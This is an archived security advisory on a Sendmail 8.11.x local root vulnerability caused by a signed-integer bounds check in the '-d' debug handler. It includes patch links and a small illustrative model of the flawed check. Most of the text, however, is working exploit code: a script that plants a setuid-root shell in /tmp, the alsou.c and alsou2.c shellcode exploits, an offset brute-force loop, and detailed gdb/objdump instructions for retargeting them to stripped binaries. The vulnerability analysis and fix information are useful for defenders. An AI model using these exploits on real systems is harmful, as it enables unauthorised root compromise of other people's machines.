COMMAND
Sendmail
SYSTEMS AFFECTED
Sendmail 8.12beta7, 8.12beta5, 8.12beta16, 8.12beta12, 8.12beta10, 8.11.5, 8.11.4, 8.11.3, 8.11.2, 8.11.1, 8.11
PROBLEM
This alert has been posted to Bugtraq as our public release of the
vulnerability discovered in Sendmail by Cade Cairns. Sendmail
contains an input validation error that may lead to the execution
of arbitrary code with elevated privileges. Local users may be able
to write arbitrary data to process memory, possibly allowing the
execution of code/commands with elevated privileges.
An input validation error exists in Sendmail's debugging
functionality. The problem is the result of the use of signed
integers in the program's tTflag() function, which is responsible
for processing arguments supplied from the command line with the
'-d' switch and writing the values to its internal "trace
vector." The vulnerability exists because it is possible to cause
a signed integer overflow by supplying a large numeric value for
the 'category' part of the debugger arguments. The numeric value
is used as an index for the trace vector.
Before the vector is written to, a check is performed to ensure
that the supplied index value is not greater than the size of the
vector. However, because a signed integer comparison is used, it
is possible to bypass the check by supplying the signed integer
equivalent of a negative value. This may allow an attacker to
write data to anywhere within a certain range of locations in
process memory.
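The flawed bounds check described above, modelled as an added example (it is not Sendmail's source and not part of the original advisory). TRACE_SIZE, the function names and the sample inputs are assumptions made for illustration; the model only computes the index each check would accept and never writes through it.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TRACE_SIZE 100 /* assumed vector size for this model */

/* Accumulate decimal digits in 32 bits, wrapping modulo 2^32. */
static uint32_t parse_digits(const char *s)
{
    uint32_t v = 0;
    while (isdigit((unsigned char)*s))
        v = v * 10u + (uint32_t)(*s++ - '0');
    return v;
}

/* Reinterpret the same 32 bits as signed (memcpy keeps this well defined). */
static int32_t as_signed(uint32_t v)
{
    int32_t out;
    memcpy(&out, &v, sizeof out);
    return out;
}

/* Flawed pattern: signed index with only an upper-bound clamp. */
long index_signed_check(const char *category)
{
    int32_t idx = as_signed(parse_digits(category));
    if (idx >= TRACE_SIZE)      /* a negative idx compares smaller and passes */
        idx = TRACE_SIZE - 1;
    return idx;
}

/* Corrected pattern: the same clamp applied to an unsigned index. */
long index_unsigned_check(const char *category)
{
    uint32_t idx = parse_digits(category);
    if (idx >= TRACE_SIZE)      /* huge values are now caught here */
        idx = TRACE_SIZE - 1;
    return (long)idx;
}

/* 1 when idx addresses a slot inside the TRACE_SIZE-entry vector. */
int in_bounds(long idx) { return idx >= 0 && idx < TRACE_SIZE; }

int main(void)
{
    /* Constructed inputs: ordinary, too large, and two that wrap negative. */
    const char *samples[] = { "57", "250", "2147483648", "4294967295" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        long s = index_signed_check(samples[i]);
        long u = index_unsigned_check(samples[i]);
        printf("%-11s signed=%ld (%s)  unsigned=%ld (%s)\n", samples[i],
               s, in_bounds(s) ? "ok" : "OUT OF BOUNDS",
               u, in_bounds(u) ? "ok" : "OUT OF BOUNDS");
    }
    return 0;
}
```

A stricter design would reject an out-of-range category outright instead of clamping it, which also makes malformed '-d' arguments visible to the caller.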
Because the '-d' command-line switch is processed before the
program drops its elevated privileges, this could lead to a
full system compromise. This vulnerability has been successfully
exploited in a laboratory environment.
An attacker with local access must determine the memory offsets
of the program's internal tTdvect variable and the location to
which he or she wishes to have data written.
The attacker must craft, in architecture-specific binary code, the
commands (or 'shellcode') to be executed with higher privilege.
The attacker must then run the program, using the '-d' flag to
overwrite a function return address with the location of the
supplied shellcode.
Following is a simple slack sendmail exploit (rh 7.1 offset
also included). It's so funny to see an old bug striking again...
GEN:
====
TMPDIR=/tmp/sx1
SHELL=/bin/bash
EXECUTABLE=$TMPDIR/owned
cp -f /bin/bash $TMPDIR/sushi
umask 022
mkdir -p $TMPDIR
chmod 777 $TMPDIR
cat <<_MUX_ >/tmp/x
O QueueDirectory=$TMPDIR
O ForwardPath=/no_forward_file
S0
R\$* \$#local \$: \$1
Mlocal, P=$EXECUTABLE, F=lsDFMAw5:/|@qSPfhn9, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,
T=DNS/RFC822/X-Unix, A=$EXECUTABLE
_MUX_
XPL:
====
#!/bin/bash
./gen
gcc -o /tmp/sx1/owned owned.c
gcc -o sxpl xp.c
./sxpl
ls -la /tmp/sushi
OWNED.C:
========
int main()
{
setuid(0);
setgid(0);
chown("/tmp/sushi", 0, 0);
chmod("/tmp/sushi", 04755);
}
XP.C:
=====
/*
simple sendmail -d pokes generator by LucySoft.
default offsets for slack 7.0 sendmail 8.11.2
redhat linux 7.1 address = 0x080ca160
in order to get offsets for sendmail you should look for some code like the following
./sendmail/trace.c
....
0x8080688 <tTflag+196>: mov 0x80b21f8,%edi
0x808068e <tTflag+202>: dec %edi
0x808068f <tTflag+203>: mov %edi,0xfffffff8(%ebp)
0x8080692 <tTflag+206>: jmp 0x808069d <tTflag+217>
0x8080694 <tTflag+208>: mov 0x80b21f4,%eax
^^^^^^^^^^^
this is the ConfFile ptr that will be overwritten
to point to the beginning of the debug array
after you found this, in gdb just x/4x 0x802b1f4
and you got the address...
redhat has stripped exe, and the machine code is using
different registers, but it's a piece of cake to find this
objdump -d /usr/sbin/sendmail > sm.asm and then search for
something like this
mov %cl,(%edi,%eax,1)
0x8080699 <tTflag+213>: mov %bl,(%esi,%eax,1)
0x808069c <tTflag+216>: inc %esi
0x808069d <tTflag+217>: cmp 0xfffffff8(%ebp),%esi
0x80806a0 <tTflag+220>: jle 0x8080694 <tTflag+208>
0x80806a2 <tTflag+222>: mov (%edx),%al
0x80806a4 <tTflag+224>: inc %edx
0x80806a5 <tTflag+225>: test %al,%al
.......
*/
#include <stdio.h>
char* strcf = "/tmp/x";
char str[1000];
char tmp[100];
char* user="root";
unsigned long ConfFile = 0x80b9ae0;
unsigned long offset = 19816;
int main(int argc, char* argv[])
{
int k, shift;
unsigned long a, ax;
k = 1;
while (k < argc)
{
if ((!strncmp(argv[k], "-offset")) && (k + 1 < argc))
{
offset = atol(argv[k+1]);
printf("* offset=%d\n", offset);
k += 2;
continue;
}
if ((!strncmp(argv[k], "-address")) && (k + 1 < argc))
{
sscanf(argv[k + 1], "%lx", &ConfFile);
printf("* address=%x\n", ConfFile);
k += 2;
continue;
}
k++;
}
strcpy(str, "echo | /usr/sbin/sendmail ");
for (k = 0; (k < strlen(strcf)) && (k < 100); k++)
{
sprintf(tmp, "-d%d.%d ", k, strcf[k]);
strcat(str, tmp);
}
shift = 0;
for (k = 0; k < 4; k++)
{
a = ((unsigned long)ConfFile >> shift) & 0x000000ff;
ax = 4294967295 - offset + k + 1;
sprintf(tmp, "-d%lu.%d ", ax, a);
strcat(str, tmp);
shift += 8;
}
strcat(str, user);
strcat(str, "\n");
printf(str);
system(str);
printf("you should have /tmp/sushi suid if everything worked fine...\n");
}
Here's another sendmail exploit for Linux x86:
/*
* alsou.c
*
* sendmail-8.11.x linux x86 exploit
*
* To use this exploit you should know two numbers: VECT and GOT.
* Use gdb to find the first:
*
* $ gdb -q /usr/sbin/sendmail
* (gdb) break tTflag
* Breakpoint 1 at 0x8080629
* (gdb) r -d1-1.1
* Starting program: /usr/sbin/sendmail -d1-1.1
*
* Breakpoint 1, 0x8080629 in tTflag ()
* (gdb) disassemble tTflag
* .............
* 0x80806ea <tTflag+202>: dec %edi
* 0x80806eb <tTflag+203>: mov %edi,0xfffffff8(%ebp)
* 0x80806ee <tTflag+206>: jmp 0x80806f9 <tTflag+217>
* 0x80806f0 <tTflag+208>: mov 0x80b21f4,%eax
* ^^^^^^^^^^^^^^^^^^ address of VECT
* 0x80806f5 <tTflag+213>: mov %bl,(%esi,%eax,1)
* 0x80806f8 <tTflag+216>: inc %esi
* 0x80806f9 <tTflag+217>: cmp 0xfffffff8(%ebp),%esi
* 0x80806fc <tTflag+220>: jle 0x80806f0 <tTflag+208>
* .............
* (gdb) x/x 0x80b21f4
* 0x80b21f4 <tTvect>: 0x080b9ae0
* ^^^^^^^^^^^^^ VECT
*
* Use objdump to find the second:
* $ objdump -R /usr/sbin/sendmail |grep setuid
* 0809e07c R_386_JUMP_SLOT setuid
* ^^^^^^^^^ GOT
*
* Probably you should play with OFFSET to make exploit work.
*
* Constant values, written in this code found for sendmail-8.11.4
* on RedHat-6.2. For sendmail-8.11.0 on RedHat-6.2 try VECT = 0x080b9ae0 and
* GOT = 0x0809e07c.
*
* To get r00t type ./alsou and then press Ctrl+C.
*
*
* grange <grange@rt.mipt.ru>
*
*/
#include <sys/types.h>
#include <stdlib.h>
#define OFFSET 1000
#define VECT 0x080baf20
#define GOT 0x0809f544
#define NOPNUM 1024
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh";
unsigned int get_esp()
{
__asm__("movl %esp,%eax");
}
int main(int argc, char *argv[])
{
char *egg, s[256], tmp[256], *av[3], *ev[2];
unsigned int got = GOT, vect = VECT, ret, first, last, i;
egg = (char *)malloc(strlen(shellcode) + NOPNUM + 5);
if (egg == NULL) {
perror("malloc()");
exit(-1);
}
sprintf(egg, "EGG=");
memset(egg + 4, 0x90, NOPNUM);
sprintf(egg + 4 + NOPNUM, "%s", shellcode);
ret = get_esp() + OFFSET;
sprintf(s, "-d");
first = -vect - (0xffffffff - got + 1);
last = first;
while (ret) {
i = ret & 0xff;
sprintf(tmp, "%u-%u.%u-", first, last, i);
strcat(s, tmp);
last = ++first;
ret = ret >> 8;
}
s[strlen(s) - 1] = '\0';
av[0] = "/usr/sbin/sendmail";
av[1] = s;
av[2] = NULL;
ev[0] = egg;
ev[1] = NULL;
execve(*av, av, ev);
}
Following is the 'alsou.c' sendmail 8.11.x (x<=5) exploit with
some very slight modifications:
- extensive documentation and an example of how to get this to
work on several distros / sendmail versions
- working on default SuSE 7.2 (sendmail 8.11.3):
- also included working parameters for SuSE 6.4 with *custom
compiled* sendmail 8.11.2:
- allows the offset to be given on the command line. Use with the
'smxploit' script (also included) in order to find the correct
offset. This will be necessary in different distros / sendmail
versions
- QUICK GUIDE for finding proper exploitation values (VECT, GOT
and OFFSET):
==> CASE A: Non-stripped binary:
==> CASE B: Stripped binary (this is the default on several
distros)
SMXPLOIT:
#!/bin/bash
# by RoMaNSoFt <roman@deathsdoor.com>
# 24.08.2001
OFFSET=$1
echo "Trying from $1 to $2 incrementing by $3"
while [ $OFFSET -le $2 ] ; do
./alsou2 $OFFSET
OFFSET=`expr $OFFSET + $3`
done
------------------------------------------------------------------
ALSOU2.C:
/*
* alsou2.c
*
* This is the 'alsou.c' sendmail 8.11.x xploit with some very slight modifications:
*
* - extensive documentation and example on how to get this to work on several distros / sm versions
* - working on default SuSE 7.2 (sendmail 8.11.3):
*
* roman@stuka:~ > gcc -o alsou2 alsou2.c
* roman@stuka:~ > ./alsou2
* Offset=2500
* Recipient names must be specified
* <ctrl-c>
* sh-2.05#
*
* - also included working parameters for SuSE 6.4 with *custom compiled* sendmail 8.11.2:
*
* [change the #define lines: comment and uncomment the corresponding lines]
* roman@emilio:~ > gcc -o alsou2 alsou2.c
* roman@emilio:~ > ./alsou2
* Offset=1500
* Recipient names must be specified
* <ctrl-c>
* sh-2.03#
*
* - allows to give offset in command line. Use with 'smxploit' script in order to find correct offset.
* This will be necessary in different distros / sendmail versions to find VECT, GOT and OFFSET parameters.
* Please read carefully the following section.
*
*
* QUICK GUIDE for finding proper exploitation values
* ===================================================
*
* ==> CASE A: Non-stripped binary:
*
* 1.- Find VECT and GOT using gdb (as explained in alsou.c original comments). Note that you cannot directly
* debug /usr/sbin/sendmail being setuid by root from a non-root account. In this case you'll simply have to:
* $ cp /usr/sbin/sendmail /tmp/sendmail
* $ gdb -q /tmp/sendmail
* ...
*
* (thanks to grange for the tip)
*
* 2.- Use 'smxploit' script to find the offset:
*
* [modify source and include VECT and GOT values found on step one]
* roman@emilio:~ > gcc -o alsou2 alsou2.c
* roman@emilio:~ > ./smxploit 500 3500 1000
* Trying from 500 to 3500 incrementing by 1000
* Offset=500
* Recipient names must be specified
* <ctrl-c>
* ./smxploit: line 10: 31767 Violación de segmento ./alsou2 $OFFSET
* Offset=1500
* Recipient names must be specified
* <ctrl-c>
* sh-2.03#
*
* You'll have to press ctrl-c several times. Yes, this could be improved... but do it by yourself :-)
*
*
* ==> CASE B: Stripped binary (this is the default on several distros):
*
* 1.- Find VECT and GOT:
*
* roman@stuka:~ > id
* uid=501(roman) gid=100(users) grupos=100(users)
* roman@stuka:~ > cp /usr/sbin/sendmail /tmp/sendmail
* roman@stuka:~ > objdump -d /tmp/sendmail >sm
* objdump: /tmp/sendmail: no symbols
*
* [first we try:]
* roman@stuka:~ > grep "mov.*%.*,(%.*,%.*,1)" sm | wc -l
* 88
* [too many found mov's but anyway:]
* roman@stuka:~ > grep -A 1 -B 1 "mov.*%.*,(%.*,%.*,1)" sm | less
* ...
* --
* 8095f53: a1 80 1a 17 08 mov 0x8171a80,%eax
* ^^^^^^^ ^^^^^^^^^
* 8095f58: 88 1c 06 mov %bl,(%esi,%eax,1)
* 8095f5b: 46 inc %esi
* -
* ...
* [we've determined that we can set the breakpoint at 0x8095f53 and do the x/x 0x8171a80]
*
* [another possible way:]
* roman@stuka:~ > grep "mov.*%.l,(%e.i,%eax,1)" sm
* 8095f58: 88 1c 06 mov %bl,(%esi,%eax,1)
* 811a212: 88 14 07 mov %dl,(%edi,%eax,1)
* 811dcf4: 88 0c 06 mov %cl,(%esi,%eax,1)
* [and now we have only three possible mov's ;-)]
*
* roman@stuka:~ > gdb -q /tmp/sendmail
* (no debugging symbols found)...(gdb) break *0x8095f53
* Breakpoint 1 at 0x8095f53
* (gdb) r -d1-1.1
* Starting program: /tmp/sendmail -d1-1.1
* (no debugging symbols found)...(no debugging symbols found)...
* (no debugging symbols found)...(no debugging symbols found)...
* (no debugging symbols found)...(no debugging symbols found)...
* (no debugging symbols found)...(no debugging symbols found)...
* (no debugging symbols found)...(no debugging symbols found)...
* (no debugging symbols found)...
* Breakpoint 1, 0x8095f53 in getopt ()
* (gdb) x/x 0x8171a80
* 0x8171a80 <stdin+82400>: 0x0817cec0
* ^^^^^^^^^^
* [so we have VECT=0x0817cec0]
* (gdb) quit
* The program is running. Exit anyway? (y or n) y
* roman@stuka:~ > objdump -R /tmp/sendmail | grep setuid
* 0815d358 R_386_JUMP_SLOT setuid
* ^^^^^^^^
* [so GOT=0x0815d358]
* roman@stuka:~ >
* [now we re-compile this source with a default OFFSET=1000]
*
* 2.- Find OFFSET:
*
* roman@stuka:~ > ./smxploit 500 3500 1000
* Trying from 500 to 3500 incrementing by 1000
* Offset=500
* Recipient names must be specified
* <ctrl-c>
* ./smxploit: line 10: 27273 Violación de segmento ./alsou2 $OFFSET
* Offset=1500
* Recipient names must be specified
* <ctrl-c>
* ./smxploit: line 10: 27275 Violación de segmento ./alsou2 $OFFSET
* Offset=2500
* Recipient names must be specified
* <ctrl-c>
* sh-2.05#
* [so we have OFFSET=2500. And we're r00t :-)]
*
*
* RoMaNSoFt <roman@deathsdoor.com>
* Spain, 26.08.2001
*
* ---------------------------------------------
* [ Original alsou.c comments ]
*
* sendmail-8.11.x linux x86 exploit
*
* To use this exploit you should know two numbers: VECT and GOT.
* Use gdb to find the first:
*
* $ gdb -q /usr/sbin/sendmail
* (gdb) break tTflag
* Breakpoint 1 at 0x8080629
* (gdb) r -d1-1.1
* Starting program: /usr/sbin/sendmail -d1-1.1
*
* Breakpoint 1, 0x8080629 in tTflag ()
* (gdb) disassemble tTflag
* .............
* 0x80806ea <tTflag+202>: dec %edi
* 0x80806eb <tTflag+203>: mov %edi,0xfffffff8(%ebp)
* 0x80806ee <tTflag+206>: jmp 0x80806f9 <tTflag+217>
* 0x80806f0 <tTflag+208>: mov 0x80b21f4,%eax
* ^^^^^^^^^^^^^^^^^^ address of VECT
* 0x80806f5 <tTflag+213>: mov %bl,(%esi,%eax,1)
* 0x80806f8 <tTflag+216>: inc %esi
* 0x80806f9 <tTflag+217>: cmp 0xfffffff8(%ebp),%esi
* 0x80806fc <tTflag+220>: jle 0x80806f0 <tTflag+208>
* .............
* (gdb) x/x 0x80b21f4
* 0x80b21f4 <tTvect>: 0x080b9ae0
* ^^^^^^^^^^^^^ VECT
*
* Use objdump to find the second:
* $ objdump -R /usr/sbin/sendmail |grep setuid
* 0809e07c R_386_JUMP_SLOT setuid
* ^^^^^^^^^ GOT
*
* Probably you should play with OFFSET to make exploit work.
*
* Constant values, written in this code found for sendmail-8.11.4
* on RedHat-6.2. For sendmail-8.11.0 on RedHat-6.2 try VECT = 0x080b9ae0 and
* GOT = 0x0809e07c.
*
* To get r00t type ./alsou and then press Ctrl+C.
*
*
* grange <grange@rt.mipt.ru>
*
*/
#include <sys/types.h>
#include <stdlib.h>
/* SuSE 7.2 Default (sendmail 8.11.3) */
#define OFFSET 2500
#define VECT 0x0817cec0
#define GOT 0x0815d358
/* SuSE 6.4 with (custom) sendmail 8.11.2
* (note SuSE 6.4 *default* is not vulnerable because it ships sendmail 8.9.3 which is not vulnerable) */
// #define OFFSET 1500
// #define VECT 0x080bdbe0
// #define GOT 0x080a2200
/* RedHat 6.2 with sendmail 8.11.4 */
// #define OFFSET 1000
// #define VECT 0x080baf20
// #define GOT 0x0809f544
#define NOPNUM 1024
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh";
unsigned int get_esp()
{
__asm__("movl %esp,%eax");
}
int main(int argc, char *argv[])
{
char *egg, s[256], tmp[256], *av[3], *ev[2];
unsigned int got = GOT, vect = VECT, ret, first, last, i, offset;
egg = (char *)malloc(strlen(shellcode) + NOPNUM + 5);
if (egg == NULL) {
perror("malloc()");
exit(-1);
}
sprintf(egg, "EGG=");
memset(egg + 4, 0x90, NOPNUM);
sprintf(egg + 4 + NOPNUM, "%s", shellcode);
if(argc > 1)
offset = atoi(argv[1]);
else
offset = OFFSET;
printf("Offset=%d\n", offset);
ret = get_esp() + offset;
sprintf(s, "-d");
first = -vect - (0xffffffff - got + 1);
last = first;
while (ret) {
i = ret & 0xff;
sprintf(tmp, "%u-%u.%u-", first, last, i);
strcat(s, tmp);
last = ++first;
ret = ret >> 8;
}
s[strlen(s) - 1] = '\0';
av[0] = "/usr/sbin/sendmail";
av[1] = s;
av[2] = NULL;
ev[0] = egg;
ev[1] = NULL;
execve(*av, av, ev);
}
SOLUTION
This vulnerability, present in sendmail open source versions
between 8.11.0 and 8.11.5, has been corrected in 8.11.6. sendmail
8.12.0.Beta users should upgrade to 8.12.0.Beta19. The problem
was not present in 8.10 or earlier versions. However, as always,
we recommend using the latest version. Note that this problem is
not remotely exploitable. Additionally, sendmail 8.12 will no
longer use a set-user-id root binary by default. Updated
packages that rectify this issue are available from the vendor:
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.0.Beta19.tar.gz
For SuSE:
ftp://ftp.suse.com/pub/suse/i386/update/7.2/n1/sendmail-8.11.3-68.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.2/sec2/sendmail-tls-8.11.3-72.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/sendmail-8.11.3-68.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.1/n1/sendmail-8.11.2-34.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.1/sec2/sendmail-tls-8.11.2-29.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/sendmail-8.11.2-34.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.0/n1/sendmail-8.11.0-5.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.0/zq1/sendmail-8.11.0-5.src.rpm
ftp://ftp.suse.com/pub/suse/sparc/update/7.1/n1/sendmail-8.11.2-17.sparc.rpm
ftp://ftp.suse.com/pub/suse/sparc/update/7.1/sec2/sendmail-tls-8.11.2-16.sparc.rpm
ftp://ftp.suse.com/pub/suse/sparc/update/7.1/zq1/sendmail-8.11.2-17.src.rpm
ftp://ftp.suse.com/pub/suse/sparc/update/7.0/n1/sendmail-8.11.0-3.sparc.rpm
ftp://ftp.suse.com/pub/suse/sparc/update/7.0/zq1/sendmail-8.11.0-3.src.rpm
ftp://ftp.suse.com/pub/suse/axp/update/7.1/n1/sendmail-8.11.2-19.alpha.rpm
ftp://ftp.suse.com/pub/suse/axp/update/7.1/sec2/sendmail-tls-8.11.2-21.alpha.rpm
ftp://ftp.suse.com/pub/suse/axp/update/7.1/zq1/sendmail-8.11.2-19.src.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/7.1/n1/sendmail-8.11.2-23.ppc.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/7.1/sec2/sendmail-tls-8.11.2-21.ppc.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/7.1/zq1/sendmail-8.11.2-23.src.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/7.0/n1/sendmail-8.11.0-33.ppc.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/7.0/zq1/sendmail-8.11.0-33.src.rpm
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/sendmail-8.11.6-1U60_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-cf-8.11.6-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-8.11.6-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-doc-8.11.6-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/sendmail-8.11.6-1U70_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-cf-8.11.6-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-8.11.6-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-doc-8.11.6-1U70_1cl.i386.rpm
For Immunix OS:
http://download.immunix.org/ImmunixOS/7.0/updates/RPMS/sendmail-8.11.6-1_imnx.i386.rpm
http://download.immunix.org/ImmunixOS/7.0/updates/RPMS/sendmail-cf-8.11.6-1_imnx.i386.rpm
http://download.immunix.org/ImmunixOS/7.0/updates/RPMS/sendmail-doc-8.11.6-1_imnx.i386.rpm
For Caldera:
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/RPMS
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/SRPMS
RPMS/sendmail-8.11.1-4.i386.rpm
RPMS/sendmail-cf-8.11.1-4.i386.rpm
RPMS/sendmail-doc-8.11.1-4.i386.rpm
SRPMS/sendmail-8.11.1-4.src.rpm
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/RPMS
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/SRPMS
RPMS/sendmail-8.11.1-4.i386.rpm
RPMS/sendmail-cf-8.11.1-4.i386.rpm
RPMS/sendmail-doc-8.11.1-4.i386.rpm
SRPMS/sendmail-8.11.1-4.src.rpm